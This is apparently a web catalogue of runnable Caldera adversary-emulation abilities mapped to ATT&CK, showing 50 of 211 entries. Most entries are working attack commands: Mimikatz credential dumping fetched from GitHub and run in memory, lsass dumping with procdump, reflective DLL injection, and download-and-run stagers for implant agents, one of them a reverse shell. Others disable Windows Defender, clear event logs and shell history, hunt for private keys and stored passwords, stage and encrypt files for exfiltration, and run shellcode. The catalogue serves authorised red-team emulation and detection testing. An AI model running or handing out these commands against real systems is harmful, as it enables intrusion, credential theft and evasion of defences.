Caldera emulation abilities
211 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2
⚠
Abilities
50 shown of 211Load Metasploit Abilities
Load Metasploit Abilities
Show command
[{"platform": "darwin,linux", "executor": "sh", "command": "msfconsole -r msf_extract.rb #{app.contact.http} #{app.api_key.red}\n"}]Advanced File Search and Stager
Highly configurable file finder and stager for Linux and Windows. Drops a payload file to the host to parse
arguments rather than running multiple commands for each fact (e.g., each file type). This ability allows for a safe
mode, only staging files found that have the appropriate file ending. The staging directory is configurable but
defaults to the current user's Recycle Bin (Windows) and /tmp (Linux). Payload files include default values for all
parameters (matching the base fact source - File Search and Stage). Options for searches: file extensions (include,
exclude [windows]), directories (include, exclude), accessed date cutoff, modified date cutoff, sensitive search
strings in files or titles.
Show command
[{"platform": "windows", "executor": "psh", "command": ".\\file_search.ps1 -Extensions '#{windows.included.extensions}' -ExcludedExtensions '#{windows.excluded.extensions}'\n -Directories '#{windows.included.directories}' -ExcludedDirectories '#{windows.excluded.directories}'\n -AccessedCutoff #{file.last.accessed} -ModifiedCutoff #{file.last.modified}\n -SearchStrings '#{file.sensitive.content}' -StagingDirectory '#{windows.staging.location}'\n -SafeMode $#{safe.mode.enabled} -PseudoExtension #{pseudo.data.identifier}\n"}, {"platform": "linux", "executor": "sh", "command": "chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'\n --directories '#{linux.included.directories}' --exclude-dir '#{linux.excluded.directories}'\n --accessed '#{file.last.accessed}' --modified '#{file.last.modified}' --search-strings '#{file.sensitive.content}'\n --staging-directory '#{linux.staging.location}' --safe-mode '#{safe.mode.enabled}' --pseudo-ext '#{pseudo.data.identifier}'\n"}]Compress staged directory (Password Protected)
This ability packages staged files into a password-protected archive. Note - Requires 7Z for Windows and GPG version 2.1+ for Linux
Show command
[{"platform": "linux", "executor": "sh", "command": "tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg\n"}, {"platform": "windows", "executor": "psh", "command": "& \"C:\\Program Files\\7-Zip\\7z.exe\" a \"#{host.dir.staged}.7z\" \"#{host.dir.staged}\\*\" \"-p#{host.archive.password}\" | Out-Null;\nsleep 1; ls #{host.dir.staged}.7z | foreach {$_.FullName} | select\n"}]Copy Clipboard
copy the contents for the clipboard and print them
Show command
[{"platform": "darwin", "executor": "sh", "command": "pbpaste\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-Clipboard -raw\n"}, {"platform": "linux", "executor": "sh", "command": "xclip -o\n"}]Create staging directory
create a directory for exfil staging
Show command
[{"platform": "darwin", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"}, {"platform": "linux", "executor": "sh", "command": "mkdir -p staged && echo $PWD/staged\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object\n"}]Find Git Repositories
This ability will locate directories that are cloned Git repositories.
Show command
[{"platform": "linux", "executor": "sh", "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n"}]Find IP addresses
Grep for IP addresses in file system per user
Show command
[{"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n"}]Find company emails
Grep for all emails for the given target company
Show command
[{"platform": "darwin", "executor": "sh", "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n"}]Find files
Locate files deemed sensitive
Show command
[{"platform": "darwin", "executor": "sh", "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n"}, {"platform": "linux", "executor": "sh", "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n"}]Parse SSH config
Search for valid SSH commands in the config file
Show command
[{"platform": "darwin", "executor": "sh", "command": "pip install stormssh && storm list\n"}, {"platform": "linux", "executor": "sh", "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n"}]PowerShell information gathering
System Information Gathering Script
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";"}]Screen Capture
capture the contents of the screen
Show command
[{"platform": "darwin", "executor": "sh", "command": "for i in {1..5}; do screencapture -t png screen-$i.png; echo \"$(cd \"$(dirname \"$1\")\"; pwd -P)/$(basename \"screen-$i.png\")\"; sleep 5; done;\n"}, {"platform": "windows", "executor": "psh,pwsh", "command": "$loadResult = [Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\");\nfunction screenshot([Drawing.Rectangle]$bounds, $path) {\n $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height;\n $graphics = [Drawing.Graphics]::FromImage($bmp);\n $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size);\n $bmp.Save($path);\n $graphics.Dispose();\n $bmp.Dispose();\n}\nif ($loadResult) {\n $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1000, 900);\n $dest = \"$HOME\\Desktop\\screenshot.png\";\n screenshot $bounds $dest;\n if (Test-Path -Path $dest) {\n $dest;\n exit 0;\n };\n};\nexit 1;\n"}]Stage sensitive files
copy files to staging directory
Show command
[{"platform": "darwin", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "linux", "executor": "sh", "command": "cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "windows", "executor": "psh", "command": "Copy-Item #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}, {"platform": "windows", "executor": "cmd", "command": "copy #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}\n"}]SysInternals PSTool Process Discovery
Process discovery via SysInternals pstool
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n"}]WMIC Process Enumeration
Capture process id, executable path, pid and parent pid before writing to disk
Show command
[{"platform": "windows", "executor": "psh", "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n"}]cURL socket address
See the raw content of a socket
Show command
[{"platform": "darwin", "executor": "sh", "command": "curl #{remote.host.socket}\n"}, {"platform": "linux", "executor": "sh", "command": "curl #{remote.host.socket}\n"}]cmd.exe information gathering
User enumeration
Show command
[{"platform": "windows", "executor": "psh", "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;"}]Elasticat
A Blue Python agent that executes elasticsearch queries.
Show command
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:elasticat.py\" -H \"platform:darwin\" $server/file/download > elasticat.py;\npip install requests;\npython elasticat.py --server=$server --es-host=\"http://127.0.0.1:9200\" --group=blue --minutes-since=60\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:elasticat.py\" -H \"platform:linux\" $server/file/download > elasticat.py;\npip install requests;\npython elasticat.py --server=$server --es-host=\"http://127.0.0.1:9200\" --group=blue --minutes-since=60\n"}]Install PSTools
Download and install PSTools by unzipping the file
Show command
[{"platform": "windows", "executor": "psh", "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n"}]Install PowerShell Core 6
Download, install and start new process under PowerShell Core 6
Show command
[{"platform": "windows", "executor": "psh", "command": "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n"}]Manx
A reverse-shell agent which communicates via the TCP contact
Show command
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\nsocket=\"#{app.contact.tcp}\";\ncontact=\"tcp\";\ncurl -s -X POST -H \"file:manx.go\" -H \"platform:darwin\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -http $server -socket $socket -contact $contact -v\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\nsocket=\"#{app.contact.tcp}\";\ncontact=\"tcp\";\ncurl -s -X POST -H \"file:manx.go\" -H \"platform:linux\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -http $server -socket $socket -contact $contact -v\n"}, {"platform": "windows", "executor": "psh", "command": "if ($host.Version.Major -ge 3){$ErrAction= \"ignore\"}else{$ErrAction= \"SilentlyContinue\"};\n$server=\"#{app.contact.http}\";\n$socket=\"#{app.contact.tcp}\";\n$contact=\"tcp\";\n$url=\"$server/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"manx.go\");\n$data=$wc.DownloadData($url);\nGet-Process | ? {$_.Path -like \"C:\\Users\\Public\\#{agents.implant_name}.exe\"} | stop-process -f -ea $ErrAction;\nrm -force \"C:\\Users\\Public\\#{agents.implant_name}.exe\" -ea $ErrAction;\n([io.file]::WriteAllBytes(\"C:\\Users\\Public\\#{agents.implant_name}.exe\",$data)) | Out-Null;\nStart-Process -FilePath C:\\Users\\Public\\#{agents.implant_name}.exe -ArgumentList \"-socket $socket -http $server -contact $contact\" -WindowStyle hidden;\n"}]Ragdoll
A Python agent which communicates via the HTML contact
Show command
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:darwin\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:ragdoll.py\" -H \"platform:linux\" $server/file/download > ragdoll.py;\npip install requests beautifulsoup4;\npython ragdoll.py -W $server#{app.contact.html}\n"}]Sandcat
Caldera's default agent, written in GoLang. Communicates through the HTTP(S) contact by default.
Show command
[{"platform": "darwin", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:sandcat.go\" -H \"platform:darwin\" -H \"architecture:amd64\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -server $server -v\n"}, {"platform": "linux", "executor": "sh", "command": "server=\"#{app.contact.http}\";\ncurl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" $server/file/download > #{agents.implant_name};\nchmod +x #{agents.implant_name};\n./#{agents.implant_name} -server $server -group red -v\n"}, {"platform": "windows", "executor": "psh", "command": "$server=\"#{app.contact.http}\";\n$url=\"$server/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$data=$wc.DownloadData($url);\nget-process | ? {$_.modules.filename -like \"C:\\Users\\Public\\#{agents.implant_name}.exe\"} | stop-process -f;\nrm -force \"C:\\Users\\Public\\#{agents.implant_name}.exe\" -ea ignore;\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\#{agents.implant_name}.exe\",$data) | Out-Null;\nStart-Process -FilePath C:\\Users\\Public\\#{agents.implant_name}.exe -ArgumentList \"-server $server -group red\" -WindowStyle hidden;\n"}]Credentials in Registry - HKCU
Search for possible credentials stored in Registry
Show command
[{"platform": "windows", "executor": "psh", "command": "reg query HKCU /f password /t REG_SZ /s\n"}]Credentials in Registry - HKLM
Search for possible credentials stored in the HKLM Hive
Show command
[{"platform": "windows", "executor": "psh", "command": "reg query HKLM /f password /t REG_SZ /s\n"}]Dump history
Get contents of bash history
Show command
[{"platform": "darwin", "executor": "sh", "command": "find ~/.bash_sessions -name '*' -exec cat {} \\; 2>/dev/null"}, {"platform": "linux", "executor": "sh", "command": "cat ~/.bash_history"}]Find private keys
Find private keys on the file system
Show command
[{"platform": "windows", "executor": "psh", "command": "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n"}, {"platform": "windows", "executor": "cmd", "command": "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n"}, {"platform": "darwin", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n"}, {"platform": "linux", "executor": "sh", "command": "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;"}]Inject Cred dumper into process (Spookier)
Injects cred dumper exe into an available process
Show command
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose"}]Leverage Procdump for lsass memory
Dump lsass for later use with mimikatz
Show command
[{"platform": "windows", "executor": "psh", "command": "$ps_url = \"https://download.sysinternals.com/files/Procdump.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"Procdump.zip\" -DestinationPath $staging_folder;\n$arch=[System.Environment]::Is64BitOperatingSystem;\n\nif ($arch) {\n iex $staging_folder\"\\procdump64.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n} else {\n iex $staging_folder\"\\procdump.exe -accepteula -ma lsass.exe\" > $env:APPDATA\\error.dmp 2>&1;\n}\nremove-item $staging_folder -Recurse;\n"}]MiniDumpWriteDump (Spooky)
Custom GO credential dumper using minidumpwritedump
Show command
[{"platform": "windows", "executor": "psh", "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n"}]Powerkatz (Staged)
Use Invoke-Mimikatz
Show command
[{"platform": "windows", "executor": "psh", "command": "Import-Module .\\invoke-mimi.ps1;\nInvoke-Mimikatz -DumpCreds\n"}]Run PowerKatz
Use powerkatz to execute mimikatz and attempt to grab plaintext and/or hashed passwords
Show command
[{"platform": "windows", "executor": "psh", "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadString(\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\");\niex $result; Invoke-Mimikatz -DumpCreds\n"}]Sniff network traffic
Perform a packet capture
Show command
[{"platform": "windows", "executor": "psh", "command": "$path = \"$ENV:UserProfile\\Desktop\\pcap.etl\";\nNew-NetEventSession -Name \"PCAP\" -CaptureMode SaveToFile -LocalFilePath $path;\nAdd-NetEventProvider -Name \"Microsoft-Windows-TCPIP\" -SessionName \"PCAP\";\nStart-NetEventSession -Name \"PCAP\";\nStart-Sleep -s 60;\nStop-NetEventSession -Name \"PCAP\";\nif (Test-Path $path) {\n echo $path;\n exit 0;\n} else {\n echo \"Failed to generate PCAP file.\";\n exit 1;\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "tcpdump -i en0 & sleep 5; kill $!\n"}]
defense-evasion
["darwin", "linux", "windows"]
T1497.003 · Virtualization/Sandbox Evasion: Time Based Evasion ↗
1-min sleep
Pause all operations to avoid making noise
Show command
[{"platform": "darwin", "executor": "sh", "command": "sleep 60"}, {"platform": "linux", "executor": "sh", "command": "sleep 60"}, {"platform": "windows", "executor": "psh", "command": "sleep 60"}]
defense-evasion
["darwin", "linux", "windows"]
T1070.003 · Indicator Removal on Host: Clear Command History ↗
Avoid logs
Stop terminal from logging history
Show command
[{"platform": "darwin", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "linux", "executor": "sh", "command": "> $HOME/.bash_history && unset HISTFILE\n"}, {"platform": "windows", "executor": "psh", "command": "Clear-History;Clear"}]Bypass ExecutionPolicy
Ensure the ExecutionPolicy is turned to Bypass
Show command
[{"platform": "windows", "executor": "psh", "command": "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")"}]Check Security Services
Check for security services. Security service list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": "$securityServices = @(\n \"msmpeng\",\n \"windefend\",\n \"mssense\",\n \"sense\",\n \"microsoft.tri.sensor\",\n \"microsoft.tri.sensor.updater\",\n \"cavp\",\n \"cb\",\n \"carbonblack\",\n \"carbonblackk\",\n \"cbcomms\",\n \"cbstream\",\n \"csfalconservice\",\n \"csfalconcontainer\",\n \"csagent\",\n \"csdevicecontrol\",\n \"csfalconservice\",\n \"xagt\",\n \"xagtnotif\",\n \"fe_avk\",\n \"fekern\",\n \"feelam\",\n \"fewscservice\",\n \"ekrn\",\n \"eguiproxy\",\n \"egui\",\n \"eamonm\",\n \"eelam\",\n \"ehdrv\",\n \"ekrnepfw\",\n \"epfwwfp\",\n \"ekbdflt\",\n \"epfw\",\n \"fsgk32st\",\n \"fswebuid\",\n \"fsgk32\",\n \"fsma32\",\n \"fssm32\",\n \"fnrb32\",\n \"fsaua\",\n \"fsorsp\",\n \"fsav32\",\n \"f-secure gatekeeper handler starter\",\n \"f-secure network request broker\",\n \"f-secure webui daemon\",\n \"fsma\",\n \"fsorspclient\",\n \"f-secure gatekeeper\",\n \"f-secure hips\",\n \"fsbts\",\n \"fsni\",\n \"fsvista\",\n \"f-secure filter\",\n \"f-secure recognizer\",\n \"fses\",\n"}]Check analysis environment processes
Check for analysis/sandbox environment processes. Process black list is based on the SUNBURST malware observed in a Solarwinds related compromise (https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/).
Show command
[{"platform": "windows", "executor": "psh", "command": "$forensicProcesses = @(\n \"apimonitor-x64\",\n \"apimonitor-x86\",\n \"autopsy64\",\n \"autopsy\",\n \"autoruns64\",\n \"autoruns\",\n \"autorunsc64\",\n \"autorunsc\",\n \"binaryninja\",\n \"blacklight\",\n \"cff explorer\",\n \"cutter\",\n \"de4dot\",\n \"debugview\",\n \"diskmon\",\n \"dnsd\",\n \"dnspy\",\n \"dotpeek32\",\n \"dotpeek64\",\n \"dumpcap\",\n \"evidence center\",\n \"exeinfope\",\n \"fakedns\",\n \"fakenet\",\n \"ffdec\",\n \"fiddler\",\n \"fileinsight\",\n \"floss\",\n \"gdb\",\n \"hiew32demo\",\n \"hiew32\",\n \"hollows_hunter\",\n \"idaq64\",\n \"idaq\",\n \"idr\",\n \"ildasm\",\n \"ilspy\",\n \"jd-gui\",\n \"lordpe\",\n \"officemalscanner\",\n \"ollydbg\",\n \"pdfstreamdumper\",\n \"pe-bear\",\n \"pebrowse64\",\n \"peid\",\n \"pe-sieve32\",\n \"pe-sieve64\",\n \"pestudio\",\n \"peview\",\n \"ppee\",\n \"procdump64\",\n \"procdump\",\n \"processhacker\",\n \"procexp64\",\n \"procexp\",\n \"procmon\",\n \"prodiscoverbasic\",\n \"py2exedecompiler\",\n \"r2agent\",\n "}]Clear Logs
Clear Sysmon logs [intended to trigger CAR-2016-04-002]
Show command
[{"platform": "windows", "executor": "psh,pwsh", "command": "Clear-Eventlog Security;\nClear-Eventlog System;\n"}]
defense-evasion
["windows", "darwin", "linux"]
T1070.004 · Indicator Removal on Host: File Deletion ↗
Deadman - Delete agent file
Deadman ability to delete agent file after termination.
Show command
[{"platform": "windows", "executor": "psh", "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n"}, {"platform": "darwin", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n"}, {"platform": "linux", "executor": "sh", "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;"}]
defense-evasion
["darwin", "linux", "windows"]
T1070.004 · Indicator Removal on Host: File Deletion ↗
Delete payload
Remove a downloaded payload file
Show command
[{"platform": "darwin", "executor": "sh", "command": ""}, {"platform": "linux", "executor": "sh", "command": ""}, {"platform": "windows", "executor": "psh,pwsh", "command": ""}]Disable Windows Defender All
Disable Windows Defender All
Show command
[{"platform": "windows", "executor": "psh", "command": "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n"}]Disable Windows Defender Real-Time Protection
Disable Windows Defender Real-Time Protection
Show command
[{"platform": "windows", "executor": "psh", "command": "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n"}]Inject Sandcat into process
Injects sandcat DLL into an available process
Show command
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n"}]Move Powershell & triage
Copy powershell to non-standard location and perform triage commands
Show command
[{"platform": "windows", "executor": "psh", "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n"}]Signed Binary Execution - Mavinject
Leverage Mavinject (signed binary) for DLL injection
Show command
[{"platform": "windows", "executor": "psh", "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n"}]Signed Binary Execution - odbcconf
Leverage odbcconf for DLL injection
Show command
[{"platform": "windows", "executor": "psh", "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n"}]Spawn calculator (shellcode)
Start a new calculator process
Show command
[{"platform": "windows", "executor": "shellcode_amd64", "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3"}]Acquire suspicious files
Get information from AV about suspicious files
Show command
[{"platform": "windows", "executor": "psh", "command": "if (Test-Path C:\\Users\\Public\\malicious_files.txt -PathType Leaf) {\n $hashes = Get-Content C:\\Users\\Public\\malicious_files.txt -Raw;\n Remove-Item C:\\Users\\Public\\malicious_files.txt;\n $hashes;\n}\n"}]Find atypical open ports
Compare open ports against a known baseline
Show command
[{"platform": "windows", "executor": "psh, pwsh", "command": "function getFullList($portList){\n $final = @();\n foreach ($p in $portList) {\n if ($p -like \"*-*\") {\n $minmax = $p.Split(\"-\");\n for ($i = ($minmax[0] -as [int]); $i -lt ($minmax[1] -as [int]); $i++) {\n $final += ($i -as [string]);\n };\n } else {\n $final += $p;\n };\n };\n return $final;\n};\n$basePorts = @(\"135\",\"139\",\"389\",\"445\",\"636\",\"1000-5000\",\"9389\",\"49152-65535\");\n$allPorts = getFullList $basePorts;\n$pidToPort = @();\nforeach ($port in (Get-NetTCPConnection -RemoteAddress 0.0.0.0 -state Listen)){\n if ($allPorts -notcontains $port.LocalPort){\n $pidToPort += , @{pid=$port.OwningProcess;port=$port.LocalPort};\n }\n};\n$pidToPort | ConvertTo-Json;\n"}]Showing 1-50 of 211